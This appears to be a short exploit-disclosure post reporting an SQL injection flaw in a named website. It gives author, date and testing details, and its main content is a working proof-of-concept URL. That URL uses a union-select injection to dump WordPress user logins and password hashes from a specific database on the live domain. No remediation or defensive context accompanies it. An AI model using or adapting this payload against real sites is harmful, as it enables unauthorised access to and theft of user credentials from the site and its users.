-------------------------------------------------------------*
#Exploit Title: springfieldsbest - SQL Injection vulnerability
#Date: 2020-10-21
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo :
https://springfieldsbest.com/health.php?ID=-9%20union%20select%20group_concat(user_login,0x3a,user_pass,%27%3Cbr%3E%27)%20from%20biocranial.wp_users%20--
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*